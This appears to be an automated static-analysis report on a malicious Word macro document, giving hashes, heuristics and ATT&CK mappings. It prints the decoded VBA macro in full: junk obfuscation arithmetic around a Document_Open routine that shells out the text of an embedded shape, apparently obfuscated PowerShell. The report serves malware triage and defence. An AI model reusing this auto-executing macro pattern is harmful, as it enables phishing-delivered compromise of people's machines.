Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e006df6ae69da59d…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 85.9 KB
Created: 2018-11-05 10:02:00
Authoring application: Microsoft Office Word
First seen: 2019-01-31
MD5: 134cd4edfa74a0468274a3d1e2720187
SHA-1: f01b4c952f46a9566bc14f9a761ee130c00ef5e3
SHA-256: e006df6ae69da59de6b699c4f0fb95ac4f0477252611855beefbf351fe3d19b1
Risk Score: 152

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1566.001 Spearphishing Attachment

This document contains a Document_Open VBA macro that executes obfuscated PowerShell code. The PowerShell script decodes and executes a second-stage payload, likely for further system compromise. The automatic Document_Open trigger combined with PowerShell execution strongly indicates malicious intent, with delivery most likely via a spearphishing attachment.

Heuristics (7)

  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 87,936 bytes but its declared streams total only 47,756 bytes — 40,180 bytes (46%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA macros detected medium (1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro present (auto-executes when the document is opened)
    Matched lines in script:
      Attribute VB_Customizable = True
      Private Sub Document_open()
         Dim wDTiIL(2)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6645 bytes
SHA-256: d55f87f7a2e1e206f59f3a566a3b69689d637030e5b7460ddd3e6001bc9955b1
Detection: ClamAV: No threats found
Obfuscation or payload: likely
268 of 351 identifiers look randomly generated (e.g. 'vSicFOIiWaDcRBMlVMNwjaam'), consistent with name-mangling obfuscation.
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ipWpkHFqHjOpPt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   Dim wDTiIL(2)
wDTiIL(0) = InStrRev(jljNwd + ijsBIVMkvJqdUDjjwZjL + oNfFL, OCQWzjq + vuNCOpMvJQtqJzXqHhSYFc + EUiXpHF) / InStrRev(wApzBjHB + YsQwJiWJcVHZmbPmam + KZpHVGz, fqDjnV + SnvATqaDtIrPzAnZTbBO + wcjjdU) - InStrRev(zHwofqiO + MoTGjqPhwFNRZUOrTHZD + rBzhPq, RBYzsw + GnIkkqFvWTWkkSoooPqR + qAYLl) - InStrRev(wzBluQ + ctltXmpOniDHQVDkt + tKtBX, BpCGmMV + iSEKKYZKuvkjoLbAbAV + OMzcw)
wDTiIL(1) = InStrRev(iLzURofr + TrcopwVRblVdIDvzad + DNZRWOAf, XjdhMZZ + itGMiHJlktvDZbQUbHR + rGrka) * InStrRev(YbXzvz + rPFPuqizaHlIFXzNUbiWj + VTCrHc, cLCBBK + CKSEOEXmwrhtWUjV + wSfMicMz) * InStrRev(uLTfMQqA + fFJksKSjhUotrnrfq + aCwVvij, jTAPsJu + KtRibGFbUcwUFiHnWO + aDnUtwL) * InStrRev(YHjwIwaq + CLdfMHcKBGwJVHnlZGQlj + fZwij, YmZwYb + ozhmbwqRVnElatEzbD + UJdkjhu)
   Dim BpjJZc(3)
BpjJZc(0) = InStr(iiDjT + jokusEHkLhPTHhisEEtz + piIDaD, Mfpsfmm + AzsMaAAMdbmsmXCZwhI + lGcsl) + InStrRev(GKztzY + jHCNZuUszYHjMvpjbTSIOB + cstquN, qiuiRtlk + DhtOcBsivQwMZPcz + uvWEszH) / InStrRev(iiQBwfa + rjCisZqiVrdJlklXKjD + zNiinNh, MHbbP + MCPlXEYwRqtDCjoffqJDU + awiIIsia) - InStrRev(nRGuolD + nvAjSwkYGCzfdcSXIzL + zALSk, GhzBw + LKGHJThsVbQLSjbTvhSm + hBwRz)
BpjJZc(1) = InStr(DMHMCpC + RHqrTmaUXZdiXWHcSzPv + NzKTKjZK, KwshCP + aWFYiOpjaqICMRzbHKnATr + bdZZDdS) - InStrRev(mpVwi + zTiNwtcXnOnmjLjODJA + krOMPKf, mBzMEkw + BPPiijzIPParwdGQjM + lGAVn)
BpjJZc(2) = InStrRev(wRSMz + FIhNGANGuCSMfEkoHdY + MoCTz, zJkYzjT + sYzFSIfSmObmjaVAS + PzODJbCf) - InStrRev(fcPEZct + WALsEousXOSnNvJOLjdmqdw + hGwbJ, wDHJPOd + hSrPTalffzsNUGtQlY + BlzFs)
   Dim TlwlFf(3)
TlwlFf(0) = InStrRev(wHFYl + GiGiUMwLCmhWAPmZib + XtvdOF, rjKUFZ + YXNljTzSCzplMoFipY + SNnuBLf) - InStrRev(utAKOhp + ddMHHdiijzrfUvXwZwGUM + sLnmGQit, VKGJP + zpsPYUSKsfIztMlS + ZjMlYk) * InStrRev(RnJdFUW + TASTvXzYwWRtYzYGjdzaAh + WVRoc, SRbEdLN + nwTXPEbuQpZSmCSd + ItsMF) / InStr(YwvSmznB + qKQptMizsJSbtsiEaLJ + DwUWQ, QYhbTHR + JhGmnGViTGIwhdImv + OfFstt)
TlwlFf(1) = InStr(LbPXRd + VwdRnzMdlWupzfwTahuNbl + ftZVh, npRaaRT + HXWaLwiUKbMajCojjuQp + MpCOW) - InStrRev(EVFDO + jwqBXCWMPtFcmrhGUzGs + IUIEiwRd, kDOSNjzj + RZULrNIXwcGWiOIbRb + oHacPtk)
TlwlFf(2) = InStrRev(Fwhjzw + bJFvViMDfVqHVofDRlGOn + AYVfi, LpRVoTdt + OPJPkruTsvvSwQdJ + wCvvfb) + InStrRev(MaXUvAYm + SdkPazUWDpDzkRMOUEdY + RYKZu, bNqMo + vPKEQJJnuIiLYUFpHIbVvc + bmtNwkj) + InStrRev(uYIlw + QQLinGBHwZUTcHfhpt + wcFPR, EJSrFiRZ + ksGzLPLfwAFQBrNGirk + uPBco) - InStrRev(ipNEA + mMGEmwzsRzVSHdzH + wNWWu, PDwqJu + cmwSNvWkTLHPijFGqzjirh + pVJLdcZ)
   Dim iizZl(1)
iizZl(0) = InStr(wiNuEGJ + scVWHSzPuXqsqVENTKJw + lYpSjjrP, UbRALkz + zlGorcqCzHjjVZVuiLjamEB + DBjKzFAL) + InStrRev(wqqjvQw + FsiQfSbfKTkqltPwkbUOqK + silKnBNk, kEsXZh + zIFwiACSMlGZbjBhAf + ApZJLEM)
   Dim ISSEz(1)
ISSEz(0) = InStrRev(VjfNtt + AzDTclNaMcwNbIbfVQSV + lGTiS, nviiqj + vsAsUAAtIvSNUYhNrfts + MLRtaji) - InStr(ZYRdbEkM + XJCSXAEVrIBAAHiAAbMZVv + AjJGSB, bKsusWz + kYYQVOCMrwKXXkDCMl + iYfzw)
Const ZcHskhKhCZw = 68556202 - 68556202
Shell@ Shapes(1).TextFrame.TextRange.Text + iKwmvv + liBza, ZcHskhKhCZw
   Dim mMHYj(1)
mMHYj(0) = InStr(AITHuVbL + mfqXAsiKlwLEjEpPP + wqinVm, WKOkikI + EOtZqsiICKQlwYiApNmF + OmDrdUb) + InStrRev(LARuG + GNkNMlOqQCIMYRIcGipiijN + XjXcCpG, tVcYNH + SrftriirVRizDdSzsa + RsmtWz)
   Dim fRoXzA(2)
fRoXzA(0) = InStr(fEGIrp + JwQKvpoGzquAPofjn + nNwtTho, TnbrAKai + ARCJlQDrUMJKLCLCHHz + WGZjA) - InStrRev(wbLXNl + dPizSKdsMpHOUBwzmfqT + GPhzLSa, ZsdCAYMd + KzzQfqOnQhmvMRcdj + IPHEqw) / InStrRev(aCJwsp + CIpDmiSmCsnHjzAckJazXQPq + wiUFRaU, cawUHoGK + CITzBWqbRmXrnUXhpJiJl + noTLQG) / InStrRev(cTfkS + wMZEFiJJTicczhfmjB + AjZrKqSj, NKSkhMfd + ridVSUzFfzOYXjrzTq + dOWEOAS)
fRoXzA(1) = InStrRev(XwFSC + FWViYwUEMKjoiIEAGvA + mYuDrJFU, uzVFEf + ACpmSNfwOCwcXrzEjc + pDWkM) - InStrRev(zUftA + AGSqMqRfppNEasaGvA + rAhuPhRj, QrtmtQ + XYjufAuunTuGHRpiSbjNG + hVLowJ)
   Dim hRQQV(3)
hRQQV(0) = InStr(jETwKUpq + WZuvHUMUNBEkhijRlNd + mvZcvCc, izZnWa + DBopbUTAQFYiAIIMvQR + zlFhFWh) * InStrRev(NKcLzK + IumWcldAfNNCjDppOEO + wEUqQNL, IHWfPXA + EqUvSGYIHVMhuPDQnqmUP + APDnSomi) - InStrRev(OAmORXFD + aNGbpzokSWFTYoUpja + bpYlCWS, mDTnIb + FwurRIOIIjkOwcimRNj + kFTQFS) + InStrRev(XVacJ + jrXuOwCpFwLdFYjcGLp + qHWNs, NiUGZp + inDdLGXXqQjmwqaOEG + KTjjcIj)
hRQQV(1) = InStrRev(lcuSIM + jjwWcZjvWPwzVEsJcZ + ojAQTm, iVOUWOMi + CjmTHDfZNPCdbKnbCGu + ldNNaGs) + InStrRev(TXzcU + NoNGZsmPBEZGIFEii + ESVFtJEH, LQpRjVHJ + wYCTEKQsXlzkXkUiiiHIN + JlbjwZtB) - InStrRev(QCAjtpP + OjRhlnbCrqQoBinIaM + jDihTzo, nIwJrEpw + qJAPbwmiBGusKzHCUcOww + GEJawJR) / InStrRev(ZfnClj + slsPoMahvpVCnuph + DwdiwXGp, nLpFMk + sCzQOclOcAIvzspPlrozld + KmFqC)
hRQQV(2) = InStr(pVpmiA + JiowWSFQXUfaDnkaiwI + iXJWtCGO, iVwjHNr + TizwlSbwZDNAsqSzLOQFjuYh + cNqQU) * InStrRev(jaXDSD + vSicFOIiWaDcRBMlVMNwjaam + ttKIQ, uEMsUiv + OnOYLSILciWzBicCcQuLjZ + zzBhSBm) + InStr(XzvalwWo + wChQktSdUbtmKMkuPU + rEkfbrSX, TVdQiRi + JrLoAColmtnllMAXRaK + GfYIu) * InStrRev(QqkBwf + cmQjldpjQZXQGHvHiUijjH + wBkOLvQ, KdKbQwo + GCKjbCXhPzGTztjwC + ALcwUkj)
   Dim cJOzVj(4)
cJOzVj(0) = InStrRev(niPJGI + LElOnoKIMTUiFoafHwdT + HwjqcM, dcuYKsoz + JNkmhpGndSlhknAbkfzvYEd + LiqIIoK) / InStrRev(UOtkpju + uJkJLwXEJRLhEcwnJdt + WLdiA, BvMilA + ulDiATnJzPMiOBjimz + EUpQQUWK) - InStr(bsYZPZj + TlkdluzhBROWbJKCBSnnu + OuplK, bzDTrEW + oICLERZGOjDFfqffhIwrS + bsjSGjNv) - InStrRev(raBwSPf + iWTFcAqGPsRkpjtnH + JjSzQdiP, vzCYHn + hqHjGMvsHjVToMnmdkw + WbWlbkhw)
cJOzVj(1) = InStrRev(aIhdZF + kbfWZHOMUAahlKiqVUH + jVNLGiNj, LjKzCP + YNwPopRTvPXAsqDtT + GTpSaDG) / InStrRev(bOGiMrQ + lpPSRNhiSIzWuGdaV + LIToIu, BaWUiROo + DsYoCcFzoGOpLJGzdFUmp + cBEpjSb) * InStr(WwXFqj + GinkLKTmpYVjGVADYKI + qsnQHBI, ZjHcwR + CYcDdjPzkqfIkAuSXCiGj + JZauYjNn) * InStrRev(LjMJXBI + ORpiObwTiXRhZqoEM + UcOhRh, BWqOQfTr + VktFjSKfkhMEvwNTj + pThBbh)
cJOzVj(2) = InStrRev(Fwclq + PswSGCSoSmEUXfIBu + iqhBdi, SNnWhUX + SRBsjdoTzazcprKFlFZuj + ZRzBlzRF) + InStrRev(ZfzBENJ + mpXKYKScwtWSnMqSNaf + wYMKE, PPaRJBGY + hpHpGHrlrWqRhQMAdzO + dHrWZ)
cJOzVj(3) = InStr(RHmtp + rRUvTpZzsKrlhbTuAM + VqWlEi, RCwUiIEv + DKwLidMZKZvPFtBwEQqS + omZpYWYo) + InStrRev(oRJHt + JUOVmbhJzwBVNStqmDBnB + zEkpzDfE, pXBtwIPX + uvwWrNCIIjNOnvTCuWRfuF + zovlQbVF) * InStr(NwjBs + QbJOzbwUfPcQvVEz + PmthtP, StdVGd + dANkpwwcmFwDvjCBpQhE + bBmmHJY) - InStrRev(sEkch + nEGJmRFwmDcoWvvNuKTV + KuVsKGV, cdzCoKwp + FvzmwISUZfUjcWjDYfiv + SwwVCzUP)
End Sub